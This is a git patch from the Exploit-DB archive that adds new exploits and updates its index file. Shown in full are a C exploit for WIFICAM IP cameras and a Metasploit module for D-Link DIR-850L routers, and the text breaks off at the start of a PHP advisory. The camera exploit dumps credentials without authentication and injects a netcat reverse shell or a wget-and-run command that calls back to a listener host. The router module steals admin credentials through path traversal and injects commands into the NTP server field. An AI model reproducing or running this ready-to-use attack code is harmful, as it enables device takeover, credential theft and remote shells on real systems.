From cb946ad7aacc7c88aae175208f8dcbedf1ff869d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 15 Nov 2017 05:01:30 +0000
Subject: [PATCH] DB: 2017-11-15

9 new exploits

GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service
GNU TAR 1.15.91 / CPIO 2.5.90 - 'safer_name_suffix' Remote Denial of Service
Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free
PHP 7.1.8 - Heap-Based Buffer Overflow

PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free
Realtek Audio Control Panel 1.0.1.65 - Exploit
Realtek Audio Microphone Calibration 1.1.1.6 - Exploit
Realtek HD Audio Control Panel 2.1.3.2 - Exploit
Realtek Audio Control Panel 1.0.1.65 - Buffer Overflow
Realtek Audio Microphone Calibration 1.1.1.6 - Buffer Overflow
Realtek HD Audio Control Panel 2.1.3.2 - Buffer Overflow

Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)
Odin Secure FTP 4.1 - 'LIST' Stack Buffer Overflow (Metasploit)
STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)
STUNSHELL Web Shell - Remote Code Execution (Metasploit)
STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)
STUNSHELL (Web Shell) - Remote Code Execution (Metasploit)
Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)
Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution
Ulterius Server < 1.9.5.0 - Directory Traversal
D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)
Dup Scout Enterprise 10.0.18 - 'Login' Buffer Overflow
Gogs (label pararm) - SQL Injection
Gogs - users and repos q SQL Injection
Gogs - 'label' SQL Injection
Gogs - 'users'/'repos' '?q' SQL Injection

Kirby CMS < 2.5.7 - Cross-Site Scripting
---
 files.csv                            |  27 ++-
 platforms/hardware/remote/43142.c    | 253 +++++++++++++++++++++++++++
 platforms/linux_mips/remote/43143.rb | 230 ++++++++++++++++++++++++
 platforms/multiple/dos/43133.php     | 142 +++++++++++++++
 platforms/multiple/remote/28981.txt  |   2 +-
 platforms/php/webapps/1317.py        |   2 +-
 platforms/php/webapps/26817.txt      |   4 +-
 platforms/php/webapps/38688.txt      |   4 +-
 platforms/php/webapps/43140.txt      |  32 ++++
 platforms/windows/dos/43131.html     | 112 ++++++++++++
 platforms/windows/dos/43144.txt      | 177 +++++++++++++++++++
 platforms/windows/local/43134.c      |   4 +-
 platforms/windows/local/43139.c      |   4 +-
 platforms/windows/remote/43132.rb    | 125 +++++++++++++
 platforms/windows/remote/43141.py    | 111 ++++++++++++
 platforms/windows/remote/43145.py    |  72 ++++++++
 16 files changed, 1282 insertions(+), 19 deletions(-)
 create mode 100755 platforms/hardware/remote/43142.c
 create mode 100755 platforms/linux_mips/remote/43143.rb
 create mode 100755 platforms/multiple/dos/43133.php
 create mode 100755 platforms/php/webapps/43140.txt
 create mode 100755 platforms/windows/dos/43131.html
 create mode 100755 platforms/windows/dos/43144.txt
 create mode 100755 platforms/windows/remote/43132.rb
 create mode 100755 platforms/windows/remote/43141.py
 create mode 100755 platforms/windows/remote/43145.py

diff --git a/files.csv b/files.csv
index d2ff02b9e..343eabe59 100644
--- a/files.csv
+++ b/files.csv
@@ -3887,7 +3887,7 @@ id,file,description,date,author,platform,type,port
 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0
 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
 40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
-30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
+30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - 'safer_name_suffix' Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
 40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
@@ -5729,7 +5729,10 @@ id,file,description,date,author,platform,type,port
 43119,platforms/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos,0
 43120,platforms/windows/dos/43120.txt,"Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos,0
 43124,platforms/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos,0
+43131,platforms/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",windows,dos,0
+43133,platforms/multiple/dos/43133.php,"PHP 7.1.8 - Heap-Based Buffer Overflow",2017-11-09,"Wei Lei and Liu Yang",multiple,dos,0
 43135,platforms/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,windows,dos,0
+43144,platforms/windows/dos/43144.txt,"PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free",2017-11-14,"X41 D-Sec GmbH",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -7002,9 +7005,9 @@ id,file,description,date,author,platform,type,port
 15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0
 15489,platforms/windows/local/15489.py,"MP3-Nator 2.0 - Buffer Overflow (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0
 15532,platforms/windows/local/15532.py,"Foxit Reader 4.1.1 - Stack Buffer Overflow",2010-11-14,sud0,windows,local,0
-15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Exploit",2010-11-14,BraniX,windows,local,0
-15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Exploit",2010-11-14,BraniX,windows,local,0
-15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Exploit",2010-11-14,BraniX,windows,local,0
+15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Buffer Overflow",2010-11-14,BraniX,windows,local,0
+15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Buffer Overflow",2010-11-14,BraniX,windows,local,0
+15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Buffer Overflow",2010-11-14,BraniX,windows,local,0
 15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter)",2010-11-15,dookie,windows,local,0
 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0
 15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH) (DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0
@@ -11383,7 +11386,7 @@ id,file,description,date,author,platform,type,port
 16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
 16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100
 16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
-16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
+16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
 16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16718,platforms/windows/remote/16718.rb,"Xlink FTP Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16719,platforms/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,21
@@ -13700,8 +13703,8 @@ id,file,description,date,author,platform,type,port
 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow (SEH)",2013-03-29,"Myo Soe",windows,remote,0
 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0
 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)",2013-04-12,Metasploit,linux,remote,5666
-24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
-24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
+24902,platforms/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
+24903,platforms/php/remote/24903.rb,"STUNSHELL (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0
 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote,0
 24905,platforms/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0
 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0
@@ -15947,6 +15950,11 @@ id,file,description,date,author,platform,type,port
 43112,platforms/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,unix,remote,0
 43118,platforms/hardware/remote/43118.txt,"Actiontec C1000A Modem - Backdoor Account",2017-11-04,"Joseph McDonagh",hardware,remote,0
 43121,platforms/windows/remote/43121.txt,"Avaya OfficeScan (IPO) < 10.1 - 'SoftConsole' Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,windows,remote,0
+43132,platforms/windows/remote/43132.rb,"Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)",2017-11-09,Metasploit,windows,remote,0
+43142,platforms/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution",2017-03-08,PierreKimSec,hardware,remote,80
+43141,platforms/windows/remote/43141.py,"Ulterius Server < 1.9.5.0 - Directory Traversal",2017-11-13,"Rick Osgood",windows,remote,0
+43143,platforms/linux_mips/remote/43143.rb,"D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)",2017-11-14,Metasploit,linux_mips,remote,0
+43145,platforms/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Buffer Overflow",2017-11-14,sickness,windows,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -34777,8 +34785,8 @@ id,file,description,date,author,platform,type,port
 35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-01-15,"Patrick de Brouwer",php,webapps,0
 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' SQL Injection",2011-01-16,ShivX,php,webapps,0
 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
-35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
-35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
+35237,platforms/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
+35238,platforms/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
 35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0
 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
 35246,platforms/php/webapps/35246.py,"Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
@@ -38824,3 +38832,4 @@ id,file,description,date,author,platform,type,port
 43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
 43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090
 43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0
+43140,platforms/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",php,webapps,0
diff --git a/platforms/hardware/remote/43142.c b/platforms/hardware/remote/43142.c
new file mode 100755
index 000000000..15745092c
--- /dev/null
+++ b/platforms/hardware/remote/43142.c
@@ -0,0 +1,253 @@
+# Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c
+# Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+
+
+#define CAM_PORT 80
+#define REMOTE_HOST "192.168.1.1"
+#define REMOTE_PORT "1337"
+#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
+#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
+#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
+
+
+#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
+#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
+
+char *    creds(char  *argv,
+                int   get_config);
+
+int       rce(char    *argv,
+              char    *id,
+              char    attack[],
+              char    desc[]);
+
+
+int   main(int        argc,
+           char       **argv,
+           char       **envp)
+{
+  char                *id;
+
+  printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
+
+  if (argc < 2)
+  {
+     printf("%s target\n", argv[0]);
+     printf("%s target --get-config      will dump the configuration and exit\n", argv[0]);
+     return (1);
+  }
+
+  if (argc == 2)
+    printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
+
+  if (argc == 3 && !strcmp(argv[2], "--get-config"))
+    id = creds(argv[1], 1);
+  else
+    id = creds(argv[1], 0);
+  
+  if (id == NULL)
+  {
+    printf("exploit failed\n");
+    return (1);
+  }
+  printf("done\n");
+
+  printf("    login = %s\n", id);
+  printf("    pass  = %s\n", id + 32);
+
+  if (!rce(argv[1], id, PAYLOAD_0, "planting"))
+    printf("done\n");
+  sleep(1);
+  if (!rce(argv[1], id, PAYLOAD_1, "executing"))
+    printf("done\n");
+  if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
+    printf("done\n");
+  if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
+    printf("done\n");
+
+  printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
+
+  return (0);
+}
+
+
+char *    creds(char  *argv,
+                int   get_config)
+{
+  int                 sock;
+  int                 n;
+  struct sockaddr_in  serv_addr;
+  char                buf[8192] = { 0 };
+  char                *out;
+  char                *tmp;
+  char                payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
+  int                 old_n;
+  int                 n_total;
+
+
+  sock = 0;
+  n = 0;
+  old_n = 0;
+  n_total = 0;
+
+  printf("[+] bypassing auth ... ");
+
+  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+  {
+    printf("Error while creating socket\n");
+    return (NULL);
+  }
+     
+  memset(&serv_addr, '0', sizeof(serv_addr));
+  serv_addr.sin_family = AF_INET;
+  serv_addr.sin_port = htons(CAM_PORT);
+
+  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
+  {
+    printf("Error while inet_pton\n");
+    return (NULL);
+  }
+
+  if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
+  {
+    printf("creds: connect failed\n");
+    return (NULL);
+  }
+
+  if (send(sock, payload, strlen(payload) , 0) < 0)
+  {
+    printf("creds: send failed\n");
+    return (NULL);
+  }
+
+  if (!(tmp = malloc(10 * 1024 * sizeof(char))))
+    return (NULL);
+
+  if (!(out = calloc(64, sizeof(char))))
+    return (NULL);
+
+  while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
+  {
+    n_total += n;
+    if (n_total < 1024 * 10)
+      memcpy(tmp + old_n, buf, n);
+    if (n >= 0)
+      old_n = n;
+  }
+
+  close(sock);
+
+  /*
+  [ HTTP HEADERS ]
+  ...
+
+  000????: 0000 0a0a 0a0a 01.. .... .... .... ....
+                ^^^^ ^^^^ ^^
+                Useful reference in the binary data
+                in order to to find the positions of
+                credentials
+  ...
+  ... 
+  0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
+  00006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
+  00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
+  00006c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
+  ...
+
+  NOTE: reference can be too:
+  000????: 0006 0606 0606 0100 000a .... .... ....
+
+  Other method: parse everything, find the "admin" string and extract the associated password
+  by adding 31bytes after the address of 'a'[dmin].
+  Works if the login is admin (seems to be this by default, but can be changed by the user)
+  */
+
+  if (get_config)
+  {
+    for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
+      printf("%c", tmp[j]);
+    exit (0);
+  }
+
+
+  for (unsigned int j = 50; j < 10 * 1024; j++)
+  {
+     if (tmp[j - 4] == 0x0a &&
+         tmp[j - 3] == 0x0a &&
+         tmp[j - 2] == 0x0a &&
+         tmp[j - 1] == 0x0a &&
+         tmp[j]     == 0x01)
+     {
+       if (j + 170 < 10 * 1024)
+       {
+         strcat(out, &tmp[j + 138]);
+         strcat(out + 32 * sizeof(char), &tmp[j + 170]);
+         free(tmp);
+
+         return (out);
+       }
+     }
+  }
+
+  free(tmp);
+
+  return (NULL);
+}
+
+int       rce(char    *argv,
+              char    *id,
+              char    attack[],
+              char    desc[])
+{
+  int                 sock;
+  struct sockaddr_in  serv_addr;
+  char                *payload;
+
+  if (!(payload = calloc(512, sizeof(char))))
+    return (1);
+
+  sock = 0;
+
+  printf("[+] %s payload ... ", desc);
+
+  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+  {
+    printf("Error while creating socket\n");
+    return (1);
+  }
+ 
+  memset(&serv_addr, '0', sizeof(serv_addr));
+  serv_addr.sin_family = AF_INET;
+  serv_addr.sin_port = htons(CAM_PORT);
+
+  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
+  {
+    printf("Error while inet_pton\n");
+    return (1);
+  }
+
+  if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
+  {
+    printf("rce: connect failed\n");
+    return (1);
+  }
+
+
+  sprintf(payload, attack, id, id + 32);
+  if (send(sock, payload, strlen(payload) , 0) < 0)
+  {
+    printf("rce: send failed\n");
+    return (1);
+  }
+
+  return (0);
+}
\ No newline at end of file
diff --git a/platforms/linux_mips/remote/43143.rb b/platforms/linux_mips/remote/43143.rb
new file mode 100755
index 000000000..d6e0ae7ec
--- /dev/null
+++ b/platforms/linux_mips/remote/43143.rb
@@ -0,0 +1,230 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'DIR-850L (Un)authenticated OS Command Exec',
+      'Description' => %q{
+        This module leverages an unauthenticated credential disclosure
+        vulnerability to then execute arbitrary commands on DIR-850L routers
+        as an authenticated user. Unable to use Meterpreter payloads.
+      },
+      'Author' => [
+        'Mumbai', # https://github.com/realoriginal (module)
+        'Zdenda' # vuln discovery
+      ],
+      'References' => [
+        ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
+        ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
+      ],
+      'DisclosureDate' => 'Aug 9 2017',
+      'License' => MSF_LICENSE,
+      'Platform' => 'linux',
+      'Arch' => ARCH_MIPSBE,
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
+      },
+      'Privileged' => true,
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/',
+        'method' => 'GET'
+        })
+      if res && res.headers['Server']
+        auth = res.headers['Server']
+        if auth =~ /DIR-850L/
+          if auth =~ /WEBACCESS\/1\.0/
+            return Exploit::CheckCode::Safe
+          else
+            return Exploit::CheckCode::Detected
+          end
+        end
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Unknown
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
+  # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
+  # should write an auxiliary module to-do -> WRITE AUXILIARY
+  def retrieve_creds
+    begin
+      xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
+      xml << "<postxml>\r\n"
+      xml << "<module>\r\n"
+      xml << "  <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
+      xml << "</module>\r\n"
+      xml << "</postxml>"
+      res = send_request_cgi({
+        'uri' => '/hedwig.cgi',
+        'method' => 'POST',
+        'encode_params' => false,
+        'headers' => {
+          'Accept-Encoding' => 'gzip, deflate',
+          'Accept' => '*/*'
+        },
+        'ctype' => 'text/xml',
+        'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
+        'data' => xml,
+      })
+      if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
+        parse = res.get_xml_document
+        username = parse.at('//name').text
+        password = parse.at('//password').text
+        vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
+        loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
+        print_good("#{peer} - Downloaded credentials to #{loot}")
+        return username, password
+      else
+        fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
+    end
+  end
+
+  def retrieve_uid
+    begin
+      res = send_request_cgi({
+          'uri' => '/authentication.cgi',
+          'method' => 'GET',
+      })
+      parse = res.get_json_document
+      uid = parse['uid']
+      challenge = parse['challenge']
+      return uid, challenge
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
+    end
+  end
+
+  def login(username, password)
+    uid, challenge = retrieve_uid
+    begin
+      hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
+      send_request_cgi({
+        'uri' => '/authentication.cgi',
+        'method' => 'POST',
+        'data' => "id=#{username}&password=#{hash}",
+        'cookie' => "uid=#{uid}"
+      })
+      return uid
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
+    end
+  end
+
+  def execute_command(cmd, opts)
+    uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
+    payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
+    payload << "<postxml>\r\n"
+    payload << "<module>\r\n"
+    payload << "  <service>DEVICE.TIME</service>\r\n"
+    payload << "  <device>\r\n"
+    payload << "    <time>\r\n"
+    payload << "      <ntp>\r\n"
+    payload << "        <enable>1</enable>\r\n"
+    payload << "        <period>604800</period>\r\n"
+    payload << "        <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
+    payload << "      </ntp>\r\n"
+    payload << "      <ntp6>\r\n"
+    payload << "        <enable>1</enable>\r\n"
+    payload << "        <period>604800</period>\r\n"
+    payload << "      </ntp6>\r\n"
+    payload << "      <timezone>20</timezone>\r\n"
+    payload << "      <time/>\r\n"
+    payload << "      <date/>\r\n"
+    payload << "      <dst>0</dst>\r\n"
+    payload << "      <dstmanual/>\r\n"
+    payload << "      <dstoffset/>\r\n"
+    payload << "    </time>\r\n"
+    payload << "  </device>\r\n"
+    payload << "</module>\r\n"
+    payload << "</postxml>"
+    begin
+      # save configuration
+      res = send_request_cgi({
+        'uri' => '/hedwig.cgi',
+        'method' => 'POST',
+        'ctype' => 'text/xml',
+        'data' => payload,
+        'cookie' => "uid=#{uid}"
+      })
+      # execute configuration
+      res = send_request_cgi({
+        'uri' => '/pigwidgeon.cgi',
+        'method' => 'POST',
+        'data' => 'ACTIONS=SETCFG,ACTIVATE',
+        'cookie' => "uid=#{uid}"
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
+    end
+  end
+
+
+  def exploit
+    print_status("#{peer} - Connecting to target...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
+    end
+    #
+    # Information Retrieval, obtains creds and logs in
+    #
+    @username, @password = retrieve_creds
+    execute_cmdstager(
+      :flavor => :wget,
+      :linemax => 200
+    )
+  end
+end
\ No newline at end of file
diff --git a/platforms/multiple/dos/43133.php b/platforms/multiple/dos/43133.php
new file mode 100755
index 000000000..61b64219f
--- /dev/null
+++ b/platforms/multiple/dos/43133.php
@@ -0,0 +1,142 @@
+Description:
+------------
+A heap out-of-bound read vulnerability in timelib_meridian() can be triggered via wddx_deserialize() or other vectors that call into this function on untrusted inputs.
+
+$ ~/php-7.1.8/sapi/cli/php --version
